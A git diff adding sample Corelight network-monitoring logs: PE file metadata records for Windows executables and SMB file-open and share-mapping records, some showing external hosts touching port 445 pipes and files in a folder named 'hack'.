XP","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":true,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".idata",".boxld01",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:32.681427Z","id":"FCZz0Wehv2RLBBak2","machine":"AMD64","compile_ts":"2014-12-15T09:28:28.000000Z","os":"Windows 8.1 or Server 2012 R2","subsystem":"WINDOWS_CUI","is_exe":true,"is_64bit":true,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".pdata",".idata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:32.681427Z","id":"F3lfRLi9lhp5GJLYj","machine":"I386","compile_ts":"2013-12-26T00:13:26.000000Z","os":"Windows XP","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":true,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".idata",".boxld01",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:40.740247Z","id":"F85BBS25dbipmePYHd","machine":"AMD64","compile_ts":"2011-01-12T23:24:11.000000Z","os":"Windows 7 or Server 2008 R2","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":true,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".pdata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:47.278235Z","id":"FI65yh2T5DvJp0mjze","machine":"I386","compile_ts":"2014-03-20T14:31:56.000000Z","os":"Windows XP","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":false,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".rsrc"]} +{"ts":"2018-08-03T23:37:53.281289Z","id":"FspIPu4Hx5dBhtAcz","machine":"I386","compile_ts":"2012-02-24T19:20:04.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:55.210749Z","id":"FufdAs1L6RGTKLXKf6","machine":"I386","compile_ts":"2015-03-07T21:52:59.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".rsrc"]} +{"ts":"2018-08-03T23:37:56.862006Z","id":"FWCcII1B92ytxoHQW","machine":"I386","compile_ts":"2014-07-09T07:58:13.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".itext",".data",".bss",".idata",".tls",".rdata",".rsrc"]} +{"ts":"2018-08-03T23:37:57.071434Z","id":"F4OnKpwV8AYJP1Fq6","machine":"I386","compile_ts":"2013-10-13T08:19:32.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".itext",".data",".bss",".idata",".tls",".rdata",".rsrc"]} +{"ts":"2018-08-03T23:37:57.255880Z","id":"FzwEgh3mapwqyQO1J6","machine":"I386","compile_ts":"2004-02-25T18:25:09.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":false,"section_names":[".text",".rdata",".data",".rsrc"]} +{"ts":"2018-08-03T23:37:58.438520Z","id":"F4t5jl1xYdzoOZJmo1","machine":"I386","compile_ts":"2012-02-24T19:19:59.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:58.448800Z","id":"FclP2w2DXpRv7gsn8","machine":"I386","compile_ts":"2012-02-24T19:19:59.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:57.640341Z","id":"FOfknK1JiD7ChXBe2","machine":"I386","compile_ts":"2012-02-24T19:19:59.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:58.521541Z","id":"FiNysT1ArFwRNFHj7b","machine":"I386","compile_ts":"2015-03-09T17:09:34.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":["UPX0","UPX1",".rsrc"]} +{"ts":"2018-08-03T23:37:58.521541Z","id":"FtO3Rx3gclVe36kawb","machine":"I386","compile_ts":"2015-03-09T17:09:34.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":["UPX0","UPX1",".rsrc"]} +{"ts":"2018-08-03T23:37:58.522218Z","id":"FCgVcIanvTKvuGHr7","machine":"I386","compile_ts":"2009-12-05T22:53:18.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc"]} +{"ts":"2018-08-03T23:37:58.606767Z","id":"F6Zh28Bc16ErNqy2i","machine":"I386","compile_ts":"2013-10-13T08:19:32.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".itext",".data",".bss",".idata",".tls",".rdata",".rsrc"]} +{"ts":"2018-08-03T23:37:58.634353Z","id":"Fr907245kSx53zFg98","machine":"I386","compile_ts":"2013-10-13T08:19:32.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".itext",".data",".bss",".idata",".tls",".rdata",".rsrc"]} +{"ts":"2018-08-03T23:37:59.050896Z","id":"FKfnVP28chXXUyZFS3","machine":"I386","compile_ts":"2012-02-24T19:20:04.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:59.071444Z","id":"FmCofc3XAawnIdYSG2","machine":"I386","compile_ts":"2012-02-24T19:19:59.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:59.380245Z","id":"FA2c5CUPtNyxVuPYc","machine":"I386","compile_ts":"2012-02-24T19:19:59.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:59.380781Z","id":"FuQNv41kO8o9Fzauo9","machine":"I386","compile_ts":"2012-02-24T19:20:04.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:38:00.445109Z","id":"FCli3F1L59PZ9xQfq5","machine":"I386","compile_ts":"2014-07-09T07:58:13.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".itext",".data",".bss",".idata",".tls",".rdata",".rsrc"]} +{"ts":"2018-08-03T23:38:08.391715Z","id":"F6GVxC1suG1TvVKPAi","machine":"I386","compile_ts":"2015-02-26T12:44:23.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":["UPX0","UPX1",".rsrc"]} +{"ts":"2018-08-03T23:38:09.896329Z","id":"FeGCxJ2F1XGcBWbDH5","machine":"I386","compile_ts":"2014-03-20T14:31:56.000000Z","os":"Windows XP","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":false,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".rsrc"]} +{"ts":"2018-08-03T23:38:10.936323Z","id":"F6gREF1QNbB6ldaZ05","machine":"I386","compile_ts":"2009-08-08T09:25:17.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":true,"section_names":[".text",".rdata",".data",".rsrc"]} +{"ts":"2018-08-03T23:38:12.079795Z","id":"FYu2TO2In8n86d7op5","machine":"I386","compile_ts":"2009-06-18T14:16:08.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":true,"section_names":[".text",".rdata",".data",".rsrc"]} +{"ts":"2018-08-03T23:38:26.099651Z","id":"F3HhVw34xlgbvs4rY3","machine":"I386","compile_ts":"2012-02-24T19:20:04.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:38:48.939731Z","id":"FxHWwi2xNc0QfLk5Ue","machine":"I386","compile_ts":"2011-12-04T21:44:10.000000Z","os":"Windows 1.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":false,"section_names":[".code",".idata"]} +{"ts":"2018-08-03T23:38:48.910415Z","id":"FE3J0j3TsIQKs4zA2c","machine":"I386","compile_ts":"2014-03-20T14:31:56.000000Z","os":"Windows XP","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":false,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".rsrc"]} +{"ts":"2018-08-03T23:38:48.936416Z","id":"FoIhp237WDbNURatZc","machine":"I386","compile_ts":"2011-12-04T21:44:10.000000Z","os":"Windows 1.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":false,"section_names":[".code",".idata"]} +{"ts":"2018-08-03T23:38:48.927301Z","id":"FHbgSb1YVdbVLUVtqa","machine":"I386","compile_ts":"2015-04-07T06:24:04.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_CUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":false,"section_names":[".text",".rdata",".data",".seg17"]} +{"ts":"2018-08-03T23:38:48.927301Z","id":"FOj8Wh4jnTs2JXfDfa","machine":"I386","compile_ts":"2015-09-19T15:48:53.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":false,"section_names":[".text",".data",".rsrc"]} +{"ts":"2018-08-03T23:38:48.927301Z","id":"Fawiz94DjZdmOoK2dj","machine":"I386","compile_ts":"2011-12-04T21:44:10.000000Z","os":"Windows 1.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":false,"section_names":[".code",".idata"]} +{"ts":"2018-08-03T23:38:49.630817Z","id":"F54Kv41wqmJYmluTNj","machine":"I386","compile_ts":"2015-04-07T14:43:55.000000Z","os":"Windows XP","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":true,"has_cert_table":false,"has_debug_data":false,"section_names":[".text",".rdata",".data",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:38:51.556709Z","id":"FXk0GZ31k7RZFFEq8c","machine":"I386","compile_ts":"2015-04-08T00:49:30.000000Z","os":"Windows XP","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":true,"has_cert_table":false,"has_debug_data":true,"section_names":[".text",".rdata",".data",".zdata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:38:56.292434Z","id":"FU7lf04eX89UTxvc2c","machine":"I386","compile_ts":"2012-02-24T19:20:04.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:38:58.894631Z","id":"FqeCdEdtohZbSZPW2","machine":"I386","compile_ts":"2012-02-24T19:20:04.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:39:01.347346Z","id":"FISJc7YSDyP0IIgZj","machine":"I386","compile_ts":"2007-10-06T03:09:43.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":false,"has_debug_data":false,"section_names":[":\u00c2I\u00ce\u009b\u00b7vA","\u000c\u00afk7\u00fa\u001d\u0012<",".rsrc"]} diff --git a/Sample Data/Custom/Corelight/smb_files_20180803_16:39:01-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/smb_files_20180803_16:39:01-16:40:00-0700.log_ new file mode 100644 index 0000000000..dbebf18773 --- /dev/null +++ b/Sample Data/Custom/Corelight/smb_files_20180803_16:39:01-16:40:00-0700.log_ @@ -0,0 +1,26 @@ +{"ts":"2018-08-03T23:39:01.304269Z","uid":"CJ2I2X3eumh4KByV81","id.orig_h":"202.177.98.46","id.orig_p":8530,"id.resp_h":"10.0.0.11","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005cSRVSVC","size":0} +{"ts":"2018-08-03T23:39:01.304269Z","uid":"CJ2I2X3eumh4KByV81","id.orig_h":"202.177.98.46","id.orig_p":8530,"id.resp_h":"10.0.0.11","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005cbrowser","size":0} +{"ts":"2018-08-03T23:39:01.307124Z","uid":"C2P6jt32gESqlJqb32","id.orig_h":"125.5.61.130","id.orig_p":4577,"id.resp_h":"10.0.0.11","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005cSRVSVC","size":0} +{"ts":"2018-08-03T23:39:01.307124Z","uid":"C2P6jt32gESqlJqb32","id.orig_h":"125.5.61.130","id.orig_p":4577,"id.resp_h":"10.0.0.11","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005cbrowser","size":0} +{"ts":"2018-08-03T23:39:01.310882Z","uid":"CbOpF7444p309keZB9","id.orig_h":"81.213.174.63","id.orig_p":54313,"id.resp_h":"10.0.0.11","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005cSRVSVC","size":0} +{"ts":"2018-08-03T23:39:01.310882Z","uid":"CbOpF7444p309keZB9","id.orig_h":"81.213.174.63","id.orig_p":54313,"id.resp_h":"10.0.0.11","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005cbrowser","size":0} +{"ts":"2018-08-03T23:39:01.310882Z","uid":"C4cMdr30cSbBpKtxH4","id.orig_h":"85.132.46.226","id.orig_p":62248,"id.resp_h":"10.0.0.11","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005cSRVSVC","size":0} +{"ts":"2018-08-03T23:39:01.310882Z","uid":"C4cMdr30cSbBpKtxH4","id.orig_h":"85.132.46.226","id.orig_p":62248,"id.resp_h":"10.0.0.11","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005cbrowser","size":0} +{"ts":"2018-08-03T23:39:02.812722Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cjpg.string","size":12801,"times.modified":"2018-07-24T17:56:05.524403Z","times.accessed":"2018-07-24T17:56:05.524403Z","times.created":"2018-07-24T17:56:05.524403Z","times.changed":"2018-07-24T17:56:05.524403Z"} +{"ts":"2018-08-03T23:39:02.812722Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005csmall.pnm","size":1910846,"times.modified":"2018-07-24T17:56:05.012403Z","times.accessed":"2018-07-24T17:56:04.848403Z","times.created":"2018-07-24T17:56:04.848403Z","times.changed":"2018-07-24T17:56:05.012403Z"} +{"ts":"2018-08-03T23:39:02.848094Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cjpghack.jpg","size":793300,"times.modified":"2018-07-24T17:56:05.128403Z","times.accessed":"2018-07-24T17:56:05.056403Z","times.created":"2018-07-24T17:56:05.056403Z","times.changed":"2018-07-24T17:56:05.128403Z"} +{"ts":"2018-08-03T23:39:02.858240Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005corder","size":53,"times.modified":"2018-07-24T17:56:04.164402Z","times.accessed":"2018-07-24T17:56:04.164402Z","times.created":"2018-07-24T17:56:04.164402Z","times.changed":"2018-07-24T17:56:04.164402Z"} +{"ts":"2018-08-03T23:39:02.858240Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005creporter.log","size":498,"times.modified":"2018-07-24T17:56:04.620403Z","times.accessed":"2018-07-24T17:56:04.616403Z","times.created":"2018-07-24T17:56:04.616403Z","times.changed":"2018-07-24T17:56:04.620403Z"} +{"ts":"2018-08-03T23:39:02.858240Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cconn.log","size":759,"times.modified":"2018-07-24T17:56:05.312402Z","times.accessed":"2018-07-24T17:56:05.308403Z","times.created":"2018-07-24T17:56:05.308403Z","times.changed":"2018-07-24T17:56:05.312402Z"} +{"ts":"2018-08-03T23:39:02.858240Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cpng.cap","size":167411,"times.modified":"2018-07-24T17:56:05.036403Z","times.accessed":"2018-07-24T17:56:05.020403Z","times.created":"2018-07-24T17:56:05.020403Z","times.changed":"2018-07-24T17:56:05.036403Z"} +{"ts":"2018-08-03T23:39:02.858240Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cgif.gif","size":54136,"times.modified":"2018-07-24T17:56:05.352403Z","times.accessed":"2018-07-24T17:56:05.348403Z","times.created":"2018-07-24T17:56:05.348403Z","times.changed":"2018-07-24T17:56:05.352403Z"} +{"ts":"2018-08-03T23:39:02.858240Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cpnm.tiff","size":1913531,"times.modified":"2018-07-24T17:56:05.520403Z","times.accessed":"2018-07-24T17:56:05.356403Z","times.created":"2018-07-24T17:56:05.356403Z","times.changed":"2018-07-24T17:56:05.520403Z"} +{"ts":"2018-08-03T23:39:02.908827Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cpacket_filter.log","size":253,"times.modified":"2018-07-24T17:56:05.132403Z","times.accessed":"2018-07-24T17:56:05.128403Z","times.created":"2018-07-24T17:56:05.128403Z","times.changed":"2018-07-24T17:56:05.132403Z"} +{"ts":"2018-08-03T23:39:02.908827Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cjpg.jpg","size":61292,"times.modified":"2018-07-24T17:56:04.832403Z","times.accessed":"2018-07-24T17:56:04.824403Z","times.created":"2018-07-24T17:56:04.824403Z","times.changed":"2018-07-24T17:56:04.832403Z"} +{"ts":"2018-08-03T23:39:02.908827Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cjpg.string.~1~","size":2373948,"times.modified":"2018-07-24T17:56:04.824403Z","times.accessed":"2018-07-24T17:56:04.620403Z","times.created":"2018-07-24T17:56:04.620403Z","times.changed":"2018-07-24T17:56:04.824403Z"} +{"ts":"2018-08-03T23:39:02.959412Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cgif-small.gif","size":1085,"times.modified":"2018-07-24T17:56:05.356403Z","times.accessed":"2018-07-24T17:56:05.352403Z","times.created":"2018-07-24T17:56:05.352403Z","times.changed":"2018-07-24T17:56:05.356403Z"} +{"ts":"2018-08-03T23:39:02.959412Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cpnm.xwd","size":5095658,"times.modified":"2018-07-24T17:56:04.600403Z","times.accessed":"2018-07-24T17:56:04.164402Z","times.created":"2018-07-24T17:56:04.164402Z","times.changed":"2018-07-24T17:56:04.600403Z"} +{"ts":"2018-08-03T23:39:03.070676Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cgif.string","size":162232,"times.modified":"2018-07-24T17:56:04.616403Z","times.accessed":"2018-07-24T17:56:04.600403Z","times.created":"2018-07-24T17:56:04.600403Z","times.changed":"2018-07-24T17:56:04.616403Z"} +{"ts":"2018-08-03T23:39:03.070676Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cftp.log","size":1040,"times.modified":"2018-07-24T17:56:05.020403Z","times.accessed":"2018-07-24T17:56:05.020403Z","times.created":"2018-07-24T17:56:05.020403Z","times.changed":"2018-07-24T17:56:05.020403Z"} +{"ts":"2018-08-03T23:39:03.070676Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cpng.png","size":148698,"times.modified":"2018-07-24T17:56:04.848403Z","times.accessed":"2018-07-24T17:56:04.832403Z","times.created":"2018-07-24T17:56:04.832403Z","times.changed":"2018-07-24T17:56:04.848403Z"} +{"ts":"2018-08-03T23:39:03.070676Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"action":"SMB::FILE_OPEN","name":"\u005chack\u005cpnm.pnm","size":1910848,"times.modified":"2018-07-24T17:56:05.308403Z","times.accessed":"2018-07-24T17:56:05.132403Z","times.created":"2018-07-24T17:56:05.132403Z","times.changed":"2018-07-24T17:56:05.308403Z"} diff --git a/Sample Data/Custom/Corelight/smb_mapping_20180803_16:39:01-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/smb_mapping_20180803_16:39:01-16:40:00-0700.log_ new file mode 100644 index 0000000000..03f0770436 --- /dev/null +++ b/Sample Data/Custom/Corelight/smb_mapping_20180803_16:39:01-16:40:00-0700.log_ @@ -0,0 +1,11 @@ +{"ts":"2018-08-03T23:39:01.304269Z","uid":"CJ2I2X3eumh4KByV81","id.orig_h":"202.177.98.46","id.orig_p":8530,"id.resp_h":"10.0.0.11","id.resp_p":445,"path":"IPC$","service":"IPC","share_type":"PIPE"} +{"ts":"2018-08-03T23:39:01.307124Z","uid":"C2P6jt32gESqlJqb32","id.orig_h":"125.5.61.130","id.orig_p":4577,"id.resp_h":"10.0.0.11","id.resp_p":445,"path":"IPC$","service":"IPC","share_type":"PIPE"} +{"ts":"2018-08-03T23:39:01.310882Z","uid":"CbOpF7444p309keZB9","id.orig_h":"81.213.174.63","id.orig_p":54313,"id.resp_h":"10.0.0.11","id.resp_p":445,"path":"IPC$","service":"IPC","share_type":"PIPE"} 